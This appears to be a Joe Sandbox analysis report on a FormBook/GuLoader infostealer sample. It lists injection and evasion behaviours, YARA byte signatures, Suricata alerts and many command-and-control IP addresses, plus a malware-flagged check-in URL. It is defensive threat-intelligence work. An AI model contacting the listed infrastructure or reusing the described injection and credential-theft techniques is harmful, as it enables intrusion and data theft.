Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UMOWA_PD.BAT.exe

Overview

General Information

Sample name:UMOWA_PD.BAT.exe
Analysis ID:1517964
MD5:d1f841d041c915f803dbe6c15b19c510
SHA1:85190628be4d7ed332737df38a580455e29155e1
SHA256:5af56bd9193c8379584ced6a37121e011007666ef1d77518e3e5ea52ec2ca7c5
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • UMOWA_PD.BAT.exe (PID: 2644 cmdline: "C:\Users\user\Desktop\UMOWA_PD.BAT.exe" MD5: D1F841D041C915F803DBE6C15B19C510)
    • UMOWA_PD.BAT.exe (PID: 2788 cmdline: "C:\Users\user\Desktop\UMOWA_PD.BAT.exe" MD5: D1F841D041C915F803DBE6C15B19C510)
      • giLTwJlyLWpfb.exe (PID: 4308 cmdline: "C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ipconfig.exe (PID: 2264 cmdline: "C:\Windows\SysWOW64\ipconfig.exe" MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
          • giLTwJlyLWpfb.exe (PID: 3276 cmdline: "C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2368 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.19061585968.0000000002F90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.19061585968.0000000002F90000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bf70:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1401f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.19981281087.0000000000AD0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.19981281087.0000000000AD0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x3a1af:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x2225e:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.15388452470.00000000000B0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries

        Sigma Signatures

        No Sigma rule has matched

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-09-25T09:55:03.457929+020020507451Malware Command and Control Activity Detected192.168.11.2049757208.91.197.2780TCP
        2024-09-25T09:55:22.370206+020020507451Malware Command and Control Activity Detected192.168.11.204976113.248.169.4880TCP
        2024-09-25T09:55:35.723129+020020507451Malware Command and Control Activity Detected192.168.11.20497653.33.130.19080TCP
        2024-09-25T09:55:49.087940+020020507451Malware Command and Control Activity Detected192.168.11.20497693.33.130.19080TCP
        2024-09-25T09:56:03.019879+020020507451Malware Command and Control Activity Detected192.168.11.204977384.32.84.3280TCP
        2024-09-25T09:56:16.778282+020020507451Malware Command and Control Activity Detected192.168.11.204977754.67.87.11080TCP
        2024-09-25T09:56:30.935035+020020507451Malware Command and Control Activity Detected192.168.11.2049781194.58.112.17480TCP
        2024-09-25T09:56:45.292818+020020507451Malware Command and Control Activity Detected192.168.11.204978538.47.207.14680TCP
        2024-09-25T09:56:59.781534+020020507451Malware Command and Control Activity Detected192.168.11.20497893.33.130.19080TCP
        2024-09-25T09:57:14.183703+020020507451Malware Command and Control Activity Detected192.168.11.2049793162.213.249.21680TCP
        2024-09-25T09:57:27.683123+020020507451Malware Command and Control Activity Detected192.168.11.20497973.33.130.19080TCP
        2024-09-25T09:57:40.949201+020020507451Malware Command and Control Activity Detected192.168.11.20498013.33.130.19080TCP
        2024-09-25T09:57:55.746480+020020507451Malware Command and Control Activity Detected192.168.11.2049805103.21.221.480TCP
        2024-09-25T09:58:10.707004+020020507451Malware Command and Control Activity Detected192.168.11.2049809133.130.35.9080TCP
        2024-09-25T09:58:24.569161+020020507451Malware Command and Control Activity Detected192.168.11.2049813137.175.33.5680TCP
        2024-09-25T09:58:37.994309+020020507451Malware Command and Control Activity Detected192.168.11.20498173.33.130.19080TCP
        2024-09-25T09:58:46.820726+020020507451Malware Command and Control Activity Detected192.168.11.2049818208.91.197.2780TCP
        2024-09-25T09:59:00.261875+020020507451Malware Command and Control Activity Detected192.168.11.204982213.248.169.4880TCP
        2024-09-25T09:59:13.409676+020020507451Malware Command and Control Activity Detected192.168.11.20498263.33.130.19080TCP
        2024-09-25T09:59:29.490424+020020507451Malware Command and Control Activity Detected192.168.11.20498303.33.130.19080TCP
        2024-09-25T09:59:43.242354+020020507451Malware Command and Control Activity Detected192.168.11.204983484.32.84.3280TCP
        2024-09-25T10:00:01.718517+020020507451Malware Command and Control Activity Detected192.168.11.204983854.67.87.11080TCP
        2024-09-25T10:00:15.489816+020020507451Malware Command and Control Activity Detected192.168.11.2049842194.58.112.17480TCP
        2024-09-25T10:00:29.723795+020020507451Malware Command and Control Activity Detected192.168.11.204984638.47.207.14680TCP
        2024-09-25T10:00:42.873084+020020507451Malware Command and Control Activity Detected192.168.11.20498503.33.130.19080TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-09-25T09:54:24.115194+020028032702Potentially Bad Traffic192.168.11.2049755185.86.211.13780TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-09-25T09:55:03.457929+020028554651A Network Trojan was detected192.168.11.2049757208.91.197.2780TCP
        2024-09-25T09:55:22.370206+020028554651A Network Trojan was detected192.168.11.204976113.248.169.4880TCP
        2024-09-25T09:55:35.723129+020028554651A Network Trojan was detected192.168.11.20497653.33.130.19080TCP
        2024-09-25T09:55:49.087940+020028554651A Network Trojan was detected192.168.11.20497693.33.130.19080TCP
        2024-09-25T09:56:03.019879+020028554651A Network Trojan was detected192.168.11.204977384.32.84.3280TCP
        2024-09-25T09:56:16.778282+020028554651A Network Trojan was detected192.168.11.204977754.67.87.11080TCP
        2024-09-25T09:56:30.935035+020028554651A Network Trojan was detected192.168.11.2049781194.58.112.17480TCP
        2024-09-25T09:56:45.292818+020028554651A Network Trojan was detected192.168.11.204978538.47.207.14680TCP
        2024-09-25T09:56:59.781534+020028554651A Network Trojan was detected192.168.11.20497893.33.130.19080TCP
        2024-09-25T09:57:14.183703+020028554651A Network Trojan was detected192.168.11.2049793162.213.249.21680TCP
        2024-09-25T09:57:27.683123+020028554651A Network Trojan was detected192.168.11.20497973.33.130.19080TCP
        2024-09-25T09:57:40.949201+020028554651A Network Trojan was detected192.168.11.20498013.33.130.19080TCP
        2024-09-25T09:57:55.746480+020028554651A Network Trojan was detected192.168.11.2049805103.21.221.480TCP
        2024-09-25T09:58:10.707004+020028554651A Network Trojan was detected192.168.11.2049809133.130.35.9080TCP
        2024-09-25T09:58:24.569161+020028554651A Network Trojan was detected192.168.11.2049813137.175.33.5680TCP
        2024-09-25T09:58:37.994309+020028554651A Network Trojan was detected192.168.11.20498173.33.130.19080TCP
        2024-09-25T09:58:46.820726+020028554651A Network Trojan was detected192.168.11.2049818208.91.197.2780TCP
        2024-09-25T09:59:00.261875+020028554651A Network Trojan was detected192.168.11.204982213.248.169.4880TCP
        2024-09-25T09:59:13.409676+020028554651A Network Trojan was detected192.168.11.20498263.33.130.19080TCP
        2024-09-25T09:59:29.490424+020028554651A Network Trojan was detected192.168.11.20498303.33.130.19080TCP
        2024-09-25T09:59:43.242354+020028554651A Network Trojan was detected192.168.11.204983484.32.84.3280TCP
        2024-09-25T10:00:01.718517+020028554651A Network Trojan was detected192.168.11.204983854.67.87.11080TCP
        2024-09-25T10:00:15.489816+020028554651A Network Trojan was detected192.168.11.2049842194.58.112.17480TCP
        2024-09-25T10:00:29.723795+020028554651A Network Trojan was detected192.168.11.204984638.47.207.14680TCP
        2024-09-25T10:00:42.873084+020028554651A Network Trojan was detected192.168.11.20498503.33.130.19080TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-09-25T09:53:50.547636+020028554641A Network Trojan was detected192.168.11.204977184.32.84.3280TCP
        2024-09-25T09:53:50.547636+020028554641A Network Trojan was detected192.168.11.204982113.248.169.4880TCP
        2024-09-25T09:53:50.547636+020028554641A Network Trojan was detected192.168.11.204977084.32.84.3280TCP
        2024-09-25T09:53:50.547636+020028554641A Network Trojan was detected192.168.11.204983384.32.84.3280TCP
        2024-09-25T09:53:50.547636+020028554641A Network Trojan was detected192.168.11.204983184.32.84.3280TCP
        2024-09-25T09:53:50.547636+020028554641A Network Trojan was detected192.168.11.204983284.32.84.3280TCP
        2024-09-25T09:53:50.547636+020028554641A Network Trojan was detected192.168.11.204977284.32.84.3280TCP
        2024-09-25T09:53:50.547636+020028554641A Network Trojan was detected192.168.11.204976013.248.169.4880TCP
        2024-09-25T09:55:14.453389+020028554641A Network Trojan was detected192.168.11.204975813.248.169.4880TCP
        2024-09-25T09:55:17.089561+020028554641A Network Trojan was detected192.168.11.204975913.248.169.4880TCP
        2024-09-25T09:55:27.774353+020028554641A Network Trojan was detected192.168.11.20497623.33.130.19080TCP
        2024-09-25T09:55:30.415381+020028554641A Network Trojan was detected192.168.11.20497633.33.130.19080TCP
        2024-09-25T09:55:34.491493+020028554641A Network Trojan was detected192.168.11.20497643.33.130.19080TCP
        2024-09-25T09:55:41.198251+020028554641A Network Trojan was detected192.168.11.20497663.33.130.19080TCP
        2024-09-25T09:55:43.804631+020028554641A Network Trojan was detected192.168.11.20497673.33.130.19080TCP
        2024-09-25T09:55:46.445414+020028554641A Network Trojan was detected192.168.11.20497683.33.130.19080TCP
        2024-09-25T09:56:08.638847+020028554641A Network Trojan was detected192.168.11.204977454.67.87.11080TCP
        2024-09-25T09:56:11.351770+020028554641A Network Trojan was detected192.168.11.204977554.67.87.11080TCP
        2024-09-25T09:56:14.072053+020028554641A Network Trojan was detected192.168.11.204977654.67.87.11080TCP
        2024-09-25T09:56:22.619001+020028554641A Network Trojan was detected192.168.11.2049778194.58.112.17480TCP
        2024-09-25T09:56:25.401135+020028554641A Network Trojan was detected192.168.11.2049779194.58.112.17480TCP
        2024-09-25T09:56:28.168648+020028554641A Network Trojan was detected192.168.11.2049780194.58.112.17480TCP
        2024-09-25T09:56:36.730543+020028554641A Network Trojan was detected192.168.11.204978238.47.207.14680TCP
        2024-09-25T09:56:39.585331+020028554641A Network Trojan was detected192.168.11.204978338.47.207.14680TCP
        2024-09-25T09:56:42.431229+020028554641A Network Trojan was detected192.168.11.204978438.47.207.14680TCP
        2024-09-25T09:56:50.966704+020028554641A Network Trojan was detected192.168.11.20497863.33.130.19080TCP
        2024-09-25T09:56:55.004962+020028554641A Network Trojan was detected192.168.11.20497873.33.130.19080TCP
        2024-09-25T09:56:56.236715+020028554641A Network Trojan was detected192.168.11.20497883.33.130.19080TCP
        2024-09-25T09:57:05.689043+020028554641A Network Trojan was detected192.168.11.2049790162.213.249.21680TCP
        2024-09-25T09:57:08.511104+020028554641A Network Trojan was detected192.168.11.2049791162.213.249.21680TCP
        2024-09-25T09:57:11.329200+020028554641A Network Trojan was detected192.168.11.2049792162.213.249.21680TCP
        2024-09-25T09:57:19.746078+020028554641A Network Trojan was detected192.168.11.20497943.33.130.19080TCP
        2024-09-25T09:57:22.402322+020028554641A Network Trojan was detected192.168.11.20497953.33.130.19080TCP
        2024-09-25T09:57:26.451214+020028554641A Network Trojan was detected192.168.11.20497963.33.130.19080TCP
        2024-09-25T09:57:33.939194+020028554641A Network Trojan was detected192.168.11.20497983.33.130.19080TCP
        2024-09-25T09:57:37.073880+020028554641A Network Trojan was detected192.168.11.20497993.33.130.19080TCP
        2024-09-25T09:57:38.307336+020028554641A Network Trojan was detected192.168.11.20498003.33.130.19080TCP
        2024-09-25T09:57:47.216429+020028554641A Network Trojan was detected192.168.11.2049802103.21.221.480TCP
        2024-09-25T09:57:50.075515+020028554641A Network Trojan was detected192.168.11.2049803103.21.221.480TCP
        2024-09-25T09:57:52.936085+020028554641A Network Trojan was detected192.168.11.2049804103.21.221.480TCP
        2024-09-25T09:58:02.308539+020028554641A Network Trojan was detected192.168.11.2049806133.130.35.9080TCP
        2024-09-25T09:58:05.106196+020028554641A Network Trojan was detected192.168.11.2049807133.130.35.9080TCP
        2024-09-25T09:58:07.910307+020028554641A Network Trojan was detected192.168.11.2049808133.130.35.9080TCP
        2024-09-25T09:58:16.462988+020028554641A Network Trojan was detected192.168.11.2049810137.175.33.5680TCP
        2024-09-25T09:58:19.168052+020028554641A Network Trojan was detected192.168.11.2049811137.175.33.5680TCP
        2024-09-25T09:58:21.862672+020028554641A Network Trojan was detected192.168.11.2049812137.175.33.5680TCP
        2024-09-25T09:58:30.081269+020028554641A Network Trojan was detected192.168.11.20498143.33.130.19080TCP
        2024-09-25T09:58:32.715271+020028554641A Network Trojan was detected192.168.11.20498153.33.130.19080TCP
        2024-09-25T09:58:35.355170+020028554641A Network Trojan was detected192.168.11.20498163.33.130.19080TCP
        2024-09-25T09:58:52.337541+020028554641A Network Trojan was detected192.168.11.204981913.248.169.4880TCP
        2024-09-25T09:58:54.985749+020028554641A Network Trojan was detected192.168.11.204982013.248.169.4880TCP
        2024-09-25T09:59:06.897843+020028554641A Network Trojan was detected192.168.11.20498233.33.130.19080TCP
        2024-09-25T09:59:09.034291+020028554641A Network Trojan was detected192.168.11.20498243.33.130.19080TCP
        2024-09-25T09:59:10.769541+020028554641A Network Trojan was detected192.168.11.20498253.33.130.19080TCP
        2024-09-25T09:59:18.642541+020028554641A Network Trojan was detected192.168.11.20498273.33.130.19080TCP
        2024-09-25T09:59:21.282687+020028554641A Network Trojan was detected192.168.11.20498283.33.130.19080TCP
        2024-09-25T09:59:23.922772+020028554641A Network Trojan was detected192.168.11.20498293.33.130.19080TCP
        2024-09-25T09:59:53.614469+020028554641A Network Trojan was detected192.168.11.204983554.67.87.11080TCP
        2024-09-25T09:59:56.315766+020028554641A Network Trojan was detected192.168.11.204983654.67.87.11080TCP
        2024-09-25T09:59:59.018393+020028554641A Network Trojan was detected192.168.11.204983754.67.87.11080TCP
        2024-09-25T10:00:07.199447+020028554641A Network Trojan was detected192.168.11.2049839194.58.112.17480TCP
        2024-09-25T10:00:09.962844+020028554641A Network Trojan was detected192.168.11.2049840194.58.112.17480TCP
        2024-09-25T10:00:12.731959+020028554641A Network Trojan was detected192.168.11.2049841194.58.112.17480TCP
        2024-09-25T10:00:21.165137+020028554641A Network Trojan was detected192.168.11.204984338.47.207.14680TCP
        2024-09-25T10:00:24.012141+020028554641A Network Trojan was detected192.168.11.204984438.47.207.14680TCP
        2024-09-25T10:00:26.863413+020028554641A Network Trojan was detected192.168.11.204984538.47.207.14680TCP
        2024-09-25T10:00:34.953818+020028554641A Network Trojan was detected192.168.11.20498473.33.130.19080TCP
        2024-09-25T10:00:37.594539+020028554641A Network Trojan was detected192.168.11.20498483.33.130.19080TCP
        2024-09-25T10:00:40.236032+020028554641A Network Trojan was detected192.168.11.20498493.33.130.19080TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for URL or domain
        Source: http://www.tempatmudisini01.click/iydt/?Xb3xI=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z+iB4Tcv9O6cZB31p1Mi5MvPz0n4i/4vc8VuesM/xDDO+6C7ZbX/5xARUztqgUqGu06GFp6xk=&O4bP=9dRH6ZfHbJXAvira URL Cloud: Label: malware
        Source: http://www.tempatmudisini01.click/iydt/Avira URL Cloud: Label: malware
        Source: http://tempatmudisini01.click/iydt/?Xb3xI=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4zAvira URL Cloud: Label: malware
        Yara detected FormBook
        Source: Yara matchFile source: 00000004.00000002.19061585968.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.19981281087.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.15388452470.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.19061692398.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.19982524217.0000000004990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.15405766333.0000000035DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: UMOWA_PD.BAT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 185.86.211.137:443 -> 192.168.11.20:49756 version: TLS 1.2
        Source: UMOWA_PD.BAT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: ipconfig.pdb source: UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A77000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15395201478.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000003.00000003.18849446171.0000000000D1B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ipconfig.pdbGCTL source: UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A77000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15395201478.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000003.00000003.18849446171.0000000000D1B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: UMOWA_PD.BAT.exe, 00000002.00000001.15100533752.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: giLTwJlyLWpfb.exe, 00000003.00000000.15312438170.000000000009E000.00000002.00000001.01000000.00000007.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19979533628.000000000009E000.00000002.00000001.01000000.00000007.sdmp
        Source: Binary string: wntdll.pdbUGP source: UMOWA_PD.BAT.exe, 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15298219117.00000000338F7000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15301885907.0000000033AAC000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15391899316.0000000003046000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15388516950.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: UMOWA_PD.BAT.exe, UMOWA_PD.BAT.exe, 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15298219117.00000000338F7000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15301885907.0000000033AAC000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15391899316.0000000003046000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15388516950.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: UMOWA_PD.BAT.exe, 00000002.00000001.15100533752.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_0040687E FindFirstFileW,FindClose,0_2_0040687E
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C2D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then mov ebx, 00000004h4_2_030E04E8

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49758 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49764 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49775 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49763 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49789 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49789 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49773 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49768 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49778 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49773 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49761 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49761 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49767 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49757 -> 208.91.197.27:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49757 -> 208.91.197.27:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49774 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49766 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49787 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49783 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49798 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49780 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49776 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49811 -> 137.175.33.56:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49792 -> 162.213.249.216:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49781 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49794 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49781 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49782 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49786 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49820 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49785 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49785 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49790 -> 162.213.249.216:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49759 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49801 -> 3.33.130.190:80
